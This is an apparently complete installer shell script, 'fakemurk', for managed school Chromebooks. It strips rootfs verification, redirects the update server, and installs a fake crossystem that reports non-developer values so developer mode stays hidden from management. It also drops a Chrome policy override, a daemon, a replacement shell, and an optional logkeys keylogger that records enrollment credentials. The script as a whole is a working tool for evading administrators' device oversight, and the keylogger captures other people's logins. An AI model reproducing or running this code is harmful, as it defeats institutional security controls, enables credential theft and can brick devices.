123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455 |
- . /usr/share/misc/chromeos-common.sh || :
- #define DEVBUILD_FLAG 1
- #if DEVBUILD_FLAG==1
- DEVBUILD=1
- devbuild_config() {
- swallow_stdin
- read -r -p "Would you like to enable enrollment credentential capturer? After finishing the script, the next boot will detect all keypresses during enrollment setup and save them to a file. This file is ONLY STORED LOCALLY, and is deleted as soon as you read it, which you can confirm by reading the source code. By using this you also acknowledge that you have permission to capture these credentials. (y\N)" choice
- echo "THIS FEATURE IS FOR CYBER SECURITY RESEARCH ONLY, DO NOT USE UNLESS YOU HAVE RED TEAM PERMISSION"
- case "$choice" in
- Y | y) INSTALL_LOGKEYS=1 ;;
- esac
- }
- drop_logkeys() {
- mkdir "$ROOT/logkeys"
- base64 -d <<-EOF | bunzip2 -dc >"$ROOT/usr/bin/logkeys"
- #include "logkeys.elf.b64"
- EOF
- base64 -d <<-EOF | bunzip2 -dc >"$ROOT/logkeys/keymap.map"
- #include "keymap.map.b64"
- EOF
- chmod 777 "$ROOT/usr/bin/logkeys"
- ln -s "$ROOT/bin/grep" "$ROOT/sbin/grep"
- touch "$ROOT/sbin/dumpkeys"
- }
- devbuild_patchroot() {
- if [ "$INSTALL_LOGKEYS" == "1" ]; then
- echo "installing logkeys"
- drop_logkeys
- touch "$ROOT/logkeys/active"
- fi
- }
- #endif
- traps() {
- set -e
- trap 'last_command=$current_command; current_command=$BASH_COMMAND' DEBUG
- trap 'echo "\"${last_command}\" command failed with exit code $?. THIS IS A BUG, REPORT IT HERE https://github.com/MercuryWorkshop/fakemurk"' EXIT
- }
- leave() {
- trap - EXIT
- echo "exiting successfully"
- exit
- }
- config() {
- swallow_stdin
- echo "please enter the your managed email's domain. example: if your email is \"randomstudent@skid.edu\" then you will enter skid.edu"
- echo "if you don't enter it correctly you won't be able to login, double check this"
- read -r -p "> " EMAIL
- echo
- swallow_stdin
- echo
- read -r -p "Would you like to enable rootfs restore? It will add an option to quickly revert all changes and re-enroll. (Y/n)" choice
- case "$choice" in
- N | n | no | No | NO) ROOTFS_BACKUP=0 ;;
- *) ROOTFS_BACKUP=1 ;;
- esac
- if [ "$DEVBUILD" == "1" ]; then
- devbuild_config
- fi
- }
- disable_rootfs_backup() {
- echo "rootfs verification is disabled for this partition, and thus it is not eligable for backup. ignoring..."
- ROOTFS_BACKUP=0
- }
- swallow_stdin() {
- while read -t 0 notused; do
- read input
- done
- }
- fakemurk_info() {
- ascii_info
- sleep 3
- cat <<-EOF
- WARNING: THIS SCRIPT WILL REQUIRE THE REMOVAL OF ROOTFS VERIFICATION, AND THE DISABLING OF AUTOUPDATES
- THIS MEANS THAT IF YOU EVER TURN OFF DEVMODE, YOUR SYSTEM WILL BE BRICKED UNTIL RECOVERY
- WE ARE NOT RESPONSIBLE FOR DAMAGE, YOU BEING STUPID AND MISUSING THIS, OR GETTING IN TROUBLE
- DO YOU UNDERSTAND??
- (enter to proceed, ctrl+c to quit)
- EOF
- swallow_stdin
- read
- }
- csys() {
- if [ "$COMPAT" == "1" ]; then
- crossystem "$@"
- elif test -f "$ROOT/usr/bin/crossystem.old"; then
- "$ROOT/usr/bin/crossystem.old" "$@"
- else
- "$ROOT/usr/bin/crossystem" "$@"
- fi
- }
- cvpd() {
- if [ "$COMPAT" == "1" ]; then
- vpd "$@"
- elif test -f "$ROOT/usr/sbin/vpd.old"; then
- "$ROOT/usr/sbin/vpd.old" "$@"
- else
- "$ROOT/usr/sbin/vpd" "$@"
- fi
- }
- sed_escape() {
- echo -n "$1" | while read -n1 ch; do
- if [[ "$ch" == "" ]]; then
- echo -n "\n"
- # dumbass shellcheck not expanding is the entire point
- fi
- echo -n "\\x$(printf %x \'"$ch")"
- done
- }
- raw_crossystem_sh() {
- base64 -d <<-EOF | bunzip2 -dc
- #include "crossystem.sh.b64"
- EOF
- }
- raw_pollen() {
- base64 -d <<-EOF | bunzip2 -dc
- #include "pollen.json.b64"
- EOF
- }
- drop_daemon() {
- base64 -d <<-EOF | bunzip2 -dc >"$ROOT/etc/init/pre-startup.conf"
- #include "pre-startup.conf.b64"
- EOF
- base64 -d <<-EOF | bunzip2 -dc >"$ROOT/sbin/fakemurk-daemon.sh"
- #include "fakemurk-daemon.sh.b64"
- EOF
- chmod 777 "$ROOT/sbin/fakemurk-daemon.sh"
- }
- drop_startup_patch() {
- move_bin "$ROOT/sbin/chromeos_startup.sh"
- base64 -d <<-EOF | bunzip2 -dc >"$ROOT/sbin/chromeos_startup.sh"
- #include "chromeos_startup.sh.b64"
- EOF
- chmod 777 "$ROOT/sbin/chromeos_startup.sh"
- }
- drop_mush() {
- move_bin "$ROOT/usr/bin/crosh"
- base64 -d <<-EOF | bunzip2 -dc >"$ROOT/usr/bin/crosh"
- #include "mush.sh.b64"
- EOF
- chmod 777 "$ROOT/usr/bin/crosh"
- }
- drop_crossystem_sh() {
- vals=$(sed "s/ /THIS_IS_A_SPACE_DUMBASS/g" <<<"$(crossystem_values)")
- raw_crossystem_sh | sed -e "s/#__SED_REPLACEME_CROSSYSTEM_VALUES#/$(sed_escape "$vals")/g" | sed -e "s/THIS_IS_A_SPACE_DUMBASS/ /g" >"$ROOT/usr/bin/crossystem"
- chmod 777 "$ROOT/usr/bin/crossystem"
- }
- drop_pollen() {
- mkdir -p "$ROOT/etc/opt/chrome/policies/managed"
- raw_pollen | sed -e "s/__SED_REPLACEME_SCHOOL_EMAIL__/${EMAIL}/g" >$ROOT/etc/opt/chrome/policies/managed/policy.json
- chmod 777 "$ROOT/etc/opt/chrome/policies/managed/policy.json"
- }
- escape() {
- case $1 in
- '' | *[!0-9]*) echo -n "\"$1\"" ;;
- *) echo -n "$1" ;;
- esac
- }
- crossystem_values() {
- readarray -t csys_lines <<<"$(csys)"
- for element in "${csys_lines[@]}"; do
- line_stripped=$(echo "$element" | sed -e "s/#.*//g" | sed -e 's/ .*=/=/g')
- # sed 1: cuts out all chars after the #
- # sed 2: cuts out all spaces before =
- IFS='=' read -r -a pair <<<"$line_stripped"
- key=${pair[0]}
- # cut out all characters after an instance of 2 spaces in a row
- val="$(echo ${pair[1]} | sed -e 's/ .*//g')"
- if [ "$key" == "devsw_cur" ]; then
- val=0
- fi
- if [ "$key" == "devsw_boot" ]; then
- val=0
- fi
- if [ "$key" == "mainfw_type" ]; then
- val="normal"
- fi
- if [ "$key" == "mainfw_act" ]; then
- val="A"
- fi
- if [ "$key" == "cros_debug" ]; then
- val=0
- fi
- if [ "$key" == "dev_boot_legacy" ]; then
- val=0
- fi
- if [ "$key" == "dev_boot_signed_only" ]; then
- val=0
- fi
- if [ "$key" == "dev_boot_usb" ]; then
- val=0
- fi
- if [ "$key" == "dev_default_boot" ]; then
- val="disk"
- fi
- if [ "$key" == "dev_enable_udc" ]; then
- val=0
- fi
- if [ "$key" == "alt_os_enabled" ]; then
- val=0
- fi
- if [ "$key" == "recoverysw_boot" ]; then
- val=0
- fi
- if [ "$key" == "recoverysw_cur" ]; then
- val=0
- fi
- echo "$key=$(escape "$val")"
- done
- }
- move_bin() {
- if test -f "$1"; then
- mv "$1" "$1.old"
- fi
- }
- is_target_booted() {
- [ -z "$COMPAT" ] && [ "$(get_booted_kernnum)" == "$TGT_KERNNUM" ]
- }
- opposite_num() {
- if [ "$1" == "2" ]; then
- echo -n 4
- elif [ "$1" == "4" ]; then
- echo -n 2
- elif [ "$1" == "3" ]; then
- echo -n 5
- elif [ "$1" == "5" ]; then
- echo -n 3
- else
- return 1
- fi
- }
- disable_autoupdates() {
- # thanks phene i guess?
- sed -i "$ROOT/etc/lsb-release" -e "s/CHROMEOS_AUSERVER=.*/CHROMEOS_AUSERVER=$(sed_escape "https://mercurywork.shop/update")/"
- }
- prepare_target_root() {
- sleep 2
- if verity_enabled_for_n "$TGT_KERNNUM"; then
- echo "removing rootfs verification on target kernel $TGT_KERN_DEV"
- /usr/share/vboot/bin/make_dev_ssd.sh --remove_rootfs_verification --partitions "$TGT_KERNNUM" -i "$DST" 2>/dev/null
- if is_target_booted; then
- # if we're booted from the target kernel, we need to reboot. this is a pretty rare circumstance
- cat <<-EOF
- ROOTFS VERIFICATION SUCCESSFULLY REMOVED
- IN ORDER TO PROCCEED, THE CHROMEBOOK MUST BE REBOOTED
- PRESS ENTER TO REBOOT, THEN ONCE BOOTED RUN THIS SCRIPT AGAIN
- EOF
- swallow_stdin
- read -r
- reboot
- leave
- fi
- fi
- if ! is_target_booted; then
- mkdir /tmp/rootmnt
- mount "$TGT_ROOT_DEV" /tmp/rootmnt
- ROOT=/tmp/rootmnt
- else
- ROOT=
- fi
- }
- get_largest_nvme_namespace() {
- local largest size tmp_size dev
- size=0
- dev=$(basename "$1")
- for nvme in /sys/block/"${dev%n*}"*; do
- tmp_size=$(cat "${nvme}"/size)
- if [ "${tmp_size}" -gt "${size}" ]; then
- largest="${nvme##*/}"
- size="${tmp_size}"
- fi
- done
- echo "${largest}"
- }
- verity_enabled_for_n() {
- grep -q "root=/dev/dm" <"${DST}p${1}"
- }
- get_booted_kernnum() {
- if (($(cgpt show -n "$DST" -i 2 -P) > $(cgpt show -n "$DST" -i 4 -P))); then
- echo -n 2
- else
- echo -n 4
- fi
- }
- cleanup() {
- if [ "$COMPAT" == "1" ]; then
- echo "pressure washing..."
- yes | mkfs.ext4 "${DST}p1" >/dev/null 2>&1 || : # hope you didn't have anything valuable on there
- fi
- cvpd -i RW_VPD -s check_enrollment=1 2>/dev/null
- cvpd -i RW_VPD -s block_devmode=0 2>/dev/null
- csys block_devmode=0 2>/dev/null
- }
- set_kernel_priority() {
- cgpt add "$DST" -i 4 -P 0
- cgpt add "$DST" -i 2 -P 0
- cgpt add "$DST" -i "$TGT_KERNNUM" -P 1
- }
- configure_target() {
- DST=/dev/$(get_largest_nvme_namespace)
- if [ "$DST" == "/dev/" ]; then
- DST=/dev/mmcblk0
- fi
- if verity_enabled_for_n 2 && verity_enabled_for_n 4; then
- TGT_KERNNUM=
- elif verity_enabled_for_n 2; then
- TGT_KERNNUM=4
- elif verity_enabled_for_n 4; then
- TGT_KERNNUM=2
- else
- TGT_KERNNUM=
- if [ "$ROOTFS_BACKUP" == "1" ]; then
- echo "Rootfs restore is requested to be enabled, but both partitions have rootfs verification disabled. Please go through the recovery process to enable rootfs verification or run again and do not choose to enable rootfs restore."
- leave
- fi
- fi
- if [ "$TGT_KERNNUM" != "2" ] && [ "$TGT_KERNNUM" != "4" ]; then
- if [ "$COMPAT" == "1" ]; then
- TGT_KERNNUM=2
- else
- TGT_KERNNUM=$(opposite_num "$(get_booted_kernnum)")
- fi
- fi
- TGT_ROOTNUM=$((TGT_KERNNUM + 1))
- TGT_KERN_DEV="${DST}p$TGT_KERNNUM"
- TGT_ROOT_DEV="${DST}p$TGT_ROOTNUM"
- ALT_ROOTNUM=$(opposite_num "$TGT_ROOTNUM")
- ALT_KERNNUM=$(opposite_num "$TGT_KERNNUM")
- ALT_KERN_DEV="${DST}p$ALT_KERNNUM"
- ALT_ROOT_DEV="${DST}p$ALT_ROOTNUM"
- echo "target kern is $TGT_KERNNUM@$TGT_KERN_DEV"
- echo "target root is $TGT_ROOTNUM@$TGT_ROOT_DEV"
- echo
- echo "backup kern is $ALT_KERNNUM@$ALT_KERN_DEV"
- echo "backup root is $ALT_ROOTNUM@$ALT_ROOT_DEV"
- }
- patch_root() {
- echo "disabling autoupdates"
- disable_autoupdates
- sleep 2
- echo "dropping crossystem.sh"
- mv "$ROOT/usr/bin/crossystem" "$ROOT/usr/bin/crossystem.old"
- drop_crossystem_sh
- echo "staging sshd"
- sleep 2
- echo "dropping pollen"
- drop_pollen
- sleep 2
- echo "preventing stateful bootloop"
- drop_startup_patch
- if [ "$COMPAT" == "1" ]; then
- touch "$ROOT/stateful_unfucked"
- fi
- echo "installing mush shell"
- drop_mush
- sleep 2
- echo "dropping fakemurk daemon"
- drop_daemon
- if [ "$DEVBUILD" == "1" ]; then
- devbuild_patchroot
- fi
- }
- main() {
- traps
- fakemurk_info
- config
- if csys mainfw_type?recovery; then
- echo "Entering shim compatability mode"
- COMPAT=1
- stty sane
- sleep 1
- fi
- echo "----- stage 1: grabbing disk configuration -----"
- configure_target
- sleep 2
- echo "----- stage 2: patching target rootfs -----"
- prepare_target_root
- patch_root
- sync
- sleep 2
- echo "----- stage 3: cleaning up -----"
- cleanup
- sleep 1
- echo "setting kernel priority"
- set_kernel_priority
- sleep 1
- echo "done! press enter to reboot, and your chromebook should enroll into management when rebooted, but stay hidden in devmode"
- swallow_stdin
- read -r
- reboot
- leave
- }
- if [ "$0" = "$BASH_SOURCE" ]; then
- stty sane
- # if [ "$SHELL" != "/bin/bash" ]; then
- # echo "hey! you ran this with \"sh\" (or some other shell). i would really prefer if you ran it with \"bash\" instead"
- # fi
- if [ "$EUID" -ne 0 ]; then
- echo "Please run as root"
- exit
- fi
- main
- fi
|